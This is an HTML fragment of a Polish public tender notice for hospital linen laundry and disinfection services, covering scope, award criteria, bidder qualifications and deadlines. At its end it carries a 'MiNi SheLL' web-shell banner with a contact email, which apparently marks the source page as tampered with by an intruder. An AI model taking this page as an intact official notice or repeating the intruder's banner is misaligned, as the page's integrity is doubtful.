wymagania zamawiającego. Ocenę łączną oferty stanowi suma punktów uzyskanych w ramach poszczególnych kryteriów. <br/>4.	Oferta może uzyskać w kryteriach oceny ofert maksymalnie 100 punktów (100%), przy czym 1 pkt = 1%. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w %. Zamawiający obliczy punkty liczbowo <br/>z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rodzaj pralnicy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest usługa w zakresie prania, prasowania, czyszczenia, dezynfekcji oraz transportu bielizny szpitalnej obejmująca:<br/>5.1.1.	Pranie, dezynfekcję termiczno – chemiczną z zastosowaniem profesjonalnych środków piorąco – dezynfekcyjnych, płukania, suszenia, odplamiania, maglowania, prasowania;<br/>5.1.2.	Pranie i dezynfekcję bielizny skażonej biologicznie;<br/>5.1.3.	Segregację i pakowanie bielizny z podziałem asortymentowym;<br/>5.1.4.	Czyszczenie chemiczne (jeżeli jest wymagane przez asortyment);<br/>5.1.5.	Serwis krawiecki (zszywania, cerowania, przyszywania guzików, przyszywania troczków, naprawy zamków błyskawicznych, odplamiania itp.)<br/>5.1.6.	Odbiór i transport bielizny (brudnej i czystej) wraz z załadunkiem i rozładunkiem;<br/>5.1.7.	Prowadzenie dokumentacji zdawczo – odbiorczej.<br/>5.2.	Wspólny słownik zamówień: CPV: <br/>98311000-6 – Usługi odbierania prania<br/>98310000-9 – Usługi prania i czyszczenia na sucho<br/>98315000-4 – Usługi prasowania<br/>5.3.	Opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji i odbioru określają: <br/>5.3.1.	Formularz ofertowy – załącznik nr 1 do SWZ – z podziałem na dwa pakiety:<br/>Pakiet nr 1 - Usługa w zakresie prania, prasowania, czyszczenia, dezynfekcji oraz transportu bielizny szpitalnej w siedzibie w Katowicach przy ul. Wita Stwosza 39-41;<br/>Pakiet nr 2 - Usługa w zakresie prania, prasowania, czyszczenia, dezynfekcji oraz transportu bielizny szpitalnej w siedzibie w Częstochowie przy ul. Kopernika 38<br/>5.3.2.	Projektowane postanowienia umowy – załącznik nr 2 do SWZ <br/>5.4.	Formularz ofertowy stanowi treść oferty i nie podlega uzupełnieniu. Niezłożenie formularza ofertowego wywiedzie negatywne skutki dla Wykonawcy w postaci odrzucenia oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>5.5.	Opis przedmiotu zamówienia oraz projektowane postanowienia umowy należy odczytywać wraz <br/>z ewentualnymi zmianami treści SWZ, będącymi np. wynikiem udzielonych odpowiedzi na zapytania Wykonawców.<br/>5.6.	Szacunkowa ilość bielizny została określona w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ.<br/>5.7.	Zobowiązania Wykonawcy:<br/>5.7.1.	Wykonawca posiada certyfikat systemu Zarządzania Jakością ISO 9001:2015 – w zakresie usług pralniczych oraz wdrożony system Analizy Ryzyka i Kontroli Skażenia Biologicznego (RABC/PN-EN 14065). <br/>5.7.2.	Wykonawca ponosi pełną odpowiedzialność prawną i materialną za jakość wykonywanych usług pralniczych oraz zgodność procesu pralniczego z wymogami sanitarnymi. <br/>5.7.3.	Preparaty stosowane do dezynfekcji i prania muszą posiadać wpis do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. <br/>5.7.4.	Proces prania wykonywany będzie w zakresie temperatur 40oC – 90oC. (zgodnie z temperaturą określoną na metkach). <br/>5.7.5.	Proces termiczno – chemiczny dopuszczalny w zakresie temperatur opisanych w dokumentacji środka dezynfekcyjnego.<br/>5.7.6.	Preparaty muszą zapewniać pełne spektrum działania: B (bakterie), F (grzyby/yeasty), V (wirusy — w tym HIV, HBV), Tbc (prątki gruźlicy), S (spory, w tym Clostridioides difficile) — tzn. posiadać odpowiednie badania wg norm (np. EN 13727, EN 13624, EN 14476, EN 13704 / EN 17126 lub równoważne). Na wezwanie zamawiającego wymagane jest dostarczenie badań / certyfikatów potwierdzających skuteczność. <br/>5.7.7.	Wykonawca na żądanie Zamawiającego zobowiązany jest przedstawiać w terminie do 3 dni wyniki kontroli procesu prania w formie wydruków lub innego zapisu. <br/>5.7.8.	Zamawiający zastrzega sobie prawo przeprowadzenia w każdym czasie kontroli pralni Wykonawcy <br/>w celu zweryfikowania wymagań zarówno przed podpisaniem umowy jak i w trakcie jej realizacji. <br/>5.7.9.	Zamawiający zastrzega sobie prawo do przekazywania do prania chemicznego odrębnie wskazanego asortymentu np. poduszki z pierza lub bieliznę i odzież z trudno usuwalnymi plamami. <br/>5.7.10.	Zamawiający zastrzega sobie prawo do przekazywania do dezynfekcji komorowej odrębnie wskazanego asortymentu np. materace, podkłady, poduszki z pierza, koce itp. <br/>5.7.11.	Barierowa odzież operacyjna winna być prana zgodnie z instrukcją producenta odzieży przy użyciu wskazanych tam środków piorących lub równoważnych.<br/>5.7.12.	Bieliznę i odzież szpitalną skażoną/zakażoną Zamawiający będzie przekazywał wykonawcy w oddzielnych zamkniętych workach. <br/>5.7.13.	Wykonawca będzie dokonywał sortowania czystej bielizny i odzieży szpitalnej z zachowaniem podziału na asortyment i komórkę przeznaczenia oznaczoną symbolem wskazanym przez Zamawiającego.<br/>5.7.14.	Bielizna skażona biologicznie, bielizna operacyjna, odzież ochronna oraz nakładki na mopy powinny być prane oddzielnie od pozostałej odzieży. <br/>5.7.15.	Zamawiający zastrzega sobie prawo przeprowadzenia kontroli wypranej bielizny pod względem: czystości bielizny, czystości mikrobiologicznej, jakości prasowania. <br/>5.7.16.	Asortyment nienadający się do prania wodnego będzie czyszczony chemicznie. <br/>5.7.17.	Wykonawca zobowiązany jest do realizacji drobnych napraw krawieckich (zszywanie, cerowanie, wymiana guzików, naprawa zamków itp.).<br/>5.7.18.	Załadunek prania brudnego z brudownika oraz rozładunek prania czystego we wskazanym przez Zamawiającego miejscu będzie wykonywane za pomocą wózków transportowych (za pomocą transporterów koszykowych z pokrowcami bakteriostatycznymi lub wózkami o pełnych ścianach). <br/>Pozostałe informacje zostały zawarte w Rozdziale 5 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98311000-6 - Usługi odbierania prania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">98310000-9 - Usługi prania i czyszczenia na sucho</p> <p class="mb-0">98315000-4 - Usługi prasowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej zamawiający kierować się będzie następującymi kryteriami oceny ofert z przypisaniem im odpowiednio wag:<br/>1)	Cena - 60% = 60 pkt <br/>2)	Termin rozpatrzenia reklamacji - 30% = 30 pkt<br/>3)	Rodzaj pralnicy – 10% = 10 pkt <br/><br/>Punkty oferty zsumowane wg wzoru:<br/>Suma = C + R<br/> gdzie:<br/>Suma - suma punktów badanej oferty,<br/>C	- ilość punktów uzyskanych za kryterium CENA<br/>T	- ilość punktów uzyskanych za kryterium TERMIN ROZPATRZENIA REKLAMACJI<br/>R	- ilość punktów uzyskanych za kryterium RODZAJ PRALNICY<br/><br/>2.	Sposób obliczania punktów dla poszczególnych kryteriów:<br/><br/>1)	CENA<br/> C = (C min / C of ) x 60 gdzie: <br/>C min - cena najniższa spośród ocenianych ofert <br/>C of - cena ocenianej oferty <br/>C - liczba punktów za kryterium ceny<br/> <br/>	ceny w powyższym wzorze rozumiane są jako ceny brutto za realizację całości przedmiotu zamówienia;<br/>	maksymalna liczba punktów do uzyskania w kryterium CENA wynosi 60 pkt;<br/>	ocenie w ramach kryterium „Cena” podlegać będzie cena brutto podana w formularzu ofertowym stanowiącym załącznik do SWZ;<br/>	punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki<br/>	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny<br/><br/>2)	TERMIN ROZPATRZENIA REKLAMACJI<br/>Termin rozpatrzenia reklamacji z tytułu źle wypranego asortymentu, zagubienia, zniszczenia, uszkodzenia asortymentu <br/>w procesie prania:<br/>- do 2 dni roboczych od momentu zgłoszenia - ilość punktów - 30<br/>- do 3 dni roboczych od momentu zgłoszenia - ilość punktów - 15<br/>- do 4 dni roboczych od momentu zgłoszenia - ilość punktów - 0<br/><br/>	maksymalna liczba punktów do uzyskania w niniejszym kryterium wynosi 30 pkt <br/>	maksymalną ilość punktów w zakresie tego kryterium otrzyma oferta Wykonawcy, który zaoferuje najkrótszy oceniany czas tj. do 2 dni roboczych od momentu telefonicznego zgłoszenia przez Zamawiającego.<br/>	jeżeli Wykonawca nie poda terminu rozpatrzenia reklamacji, Zamawiający przyjmie, <br/>że składając ofertę Wykonawca oferuje najdłuższy dopuszczony termin rozpatrzenia reklamacji czyli do 4 dni roboczych od momentu telefonicznego zgłoszenia przez Zamawiającego i nie otrzyma punktów w kryterium „termin rozpatrzenia reklamacji.”<br/>	jeżeli Wykonawca poda w ofercie termin rozpatrzenia reklamacji powyżej 4 dni roboczych od momentu zgłoszenia, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5 jako niezgodną z warunkami zamówienia. <br/>	ocenie w ramach kryterium podlegać będzie informacja podana przez Wykonawcę w formularzu ofertowym. Kryterium to będzie rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym terminu rozpatrzenia reklamacji<br/><br/>3)	RODZAJ PRALNICY<br/><br/>Maksymalna liczba punktów do uzyskania w kryterium „Rodzaj pralnicy” wynosi 10 punktów. Punktacja zostanie przyznana w następujący sposób:<br/>Przedmiot umowy prany w pralnicy tunelowej zakończonej wirówką, która stanowi wyposażenie pralni Wykonawcy<br/>TAK – 10 pkt<br/>NIE – 0 pkt<br/> <br/>Wykonawca w formularzu ofertowym winien wskazać czy przedmiot umowy prany będzie w pralnicy tunelowej zakończonej wirówką. W przypadku braku wskazania żadnej odpowiedzi, Zamawiający uzna, iż wykonawca nie będzie realizował usługi prania w pralnicy tunelowej zakończonej wirówką i nie przyzna punktów w kryterium.<br/><br/>3.	Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie ze wszystkich kryteriów i spełniająca pozostałe wymagania zamawiającego. Ocenę łączną oferty stanowi suma punktów uzyskanych w ramach poszczególnych kryteriów. <br/>4.	Oferta może uzyskać w kryteriach oceny ofert maksymalnie 100 punktów (100%), przy czym 1 pkt = 1%. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w %. Zamawiający obliczy punkty liczbowo <br/>z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rodzaj pralnicy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 9.1.	Zamawiający udzieli zamówienia Wykonawcy, który spełni warunki zawarte w ustawie, oraz wymagania określone w Specyfikacji Warunków Zamówienia wraz z załącznikami stanowiącymi integralną cześć SWZ.<br/>9.2.	Warunki udziału w postępowaniu.<br/>9.2.1.	zdolność do występowania w obrocie gospodarczym: brak warunku <br/>9.2.2.	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: brak warunku <br/>9.2.3.	sytuacja ekonomiczna lub finansowa:<br/>Wykonawca spełni warunek jeśli wykaże, że posiada dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, ze wskazaniem ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności oraz klauzulą obejmującą ryzyko przeniesienia chorób zakaźnych i zakażeń (w tym HIV oraz WZW) na sumę gwarancyjną minimum: 200.000,00zł. Wraz dowodem uiszczenia opłaty<br/><br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, o których mowa w zdaniu pierwszym wówczas wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu.<br/><br/>W przypadku wykazania się posiadaniem ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w walucie innej niż PLN, przeliczenie tych wartości nastąpi po średnim kursie ogłoszonym przez NBP w dniu opublikowania ogłoszenia w DUUE. W przypadku gdy w tym dniu, NBP nie opublikuje tabeli kursów średnich, zamawiający przyjmie jako podstawę kurs z tabeli kursów średnich opublikowanych w dniu najbliższym po dniu publikacji ogłoszenia o zamówieniu w DUUE.<br/><br/>9.2.4.	zdolność techniczna lub zawodowa:<br/>Zamawiający będzie dokonywał oceny zdolności technicznej lub zawodowej wykonawcy na podstawie minimalnych warunków dotyczących doświadczenia, zarówno samych wykonawców, jak i osób skierowanych przez wykonawcę do realizacji zamówienia.<br/><br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli wykaże że:<br/>a)	pralnia, w której świadczona będzie usługa posiada pozytywną opinię sanitarną Państwowego Inspektora Sanitarnego w sprawie oceny pomieszczeń przeznaczonych na usługi pralnicze <br/>w zakresie prania bielizny szpitalnej i posiada Certyfikat Systemu Zarządzania Jakością ISO 9001:2015 - w zakresie usług pralniczych oraz posiada System Analizy Ryzyka i Kontroli Skażenia Biologicznego - RABC.<br/>b)	w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował co najmniej 2 (dwie) usługi (umowy) prania w ilości nie mniejszej niż 4 000 kg miesięcznie.<br/>c)	dysponuje co najmniej dwoma pojazdami do transportu brudnego i czystego asortymentu, posiadającymi aktualną opinię Państwowej Inspekcji Sanitarnej, potwierdzającą, że są one przystosowane do przewozu bielizny szpitalnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">10.1.	Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie z art. 125 ust. 1 potwierdzające, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu – załącznik nr 3 do SWZ<br/>10.2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa w pkt 10.1 SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia.<br/>10.3.	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu - w zakresie, w jakim powołuje się na ich zasoby, składa także oświadczenie, o którym mowa w pkt 10.1 SWZ dotyczące tych podmiotów.<br/>10.4.	Zgodnie z art. 274 ust. 1 Pzp Zamawiający przed wyborem najkorzystniejszej oferty, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>10.4.1.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy – załącznik nr 5 do SWZ<br/>10.4.2.	Polisa OC wraz z opłatą raty na potwierdzenie spełnienia warunku udziału w postepowaniu<br/>10.4.3.	Pozytywną Opinię Sanitarną Państwowego Inspektora Sanitarnego w sprawie oceny pomieszczeń przeznaczonych na usługi pralnicze w zakresie prania bielizny szpitalnej i posiada Certyfikat Systemu Zarządzania Jakością ISO 9001:2015 - w zakresie usług pralniczych oraz posiada System Analizy Ryzyka i Kontroli Skażenia Biologicznego – RABC (dotyczy pralni, w której świadczona będzie usługa);<br/>10.4.4.	Wykazu usług potwierdzającego realizację w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, co najmniej 2 (dwóch) usług (umowy) prania w ilości nie mniejszej niż 4 000 kg miesięcznie – załącznik nr 6 do SWZ<br/>10.4.5.	Wykazu pojazdów potwierdzającego, że Wykonawca będzie dysponował co najmniej dwoma pojazdami do transportu brudnego i czystego asortymentu, posiadającymi aktualną opinię Państwowej Inspekcji Sanitarnej, potwierdzającą, że są one przystosowane do przewozu bielizny szpitalnej – załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa w pkt 10.1 SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian umowy został określony w projektowanych postanowieniach umowy stanowiących załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-31 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zozmswiakatowice.ezamawiajacy.pl/pn/zozmswiakatowice/demand/239531/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-31 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com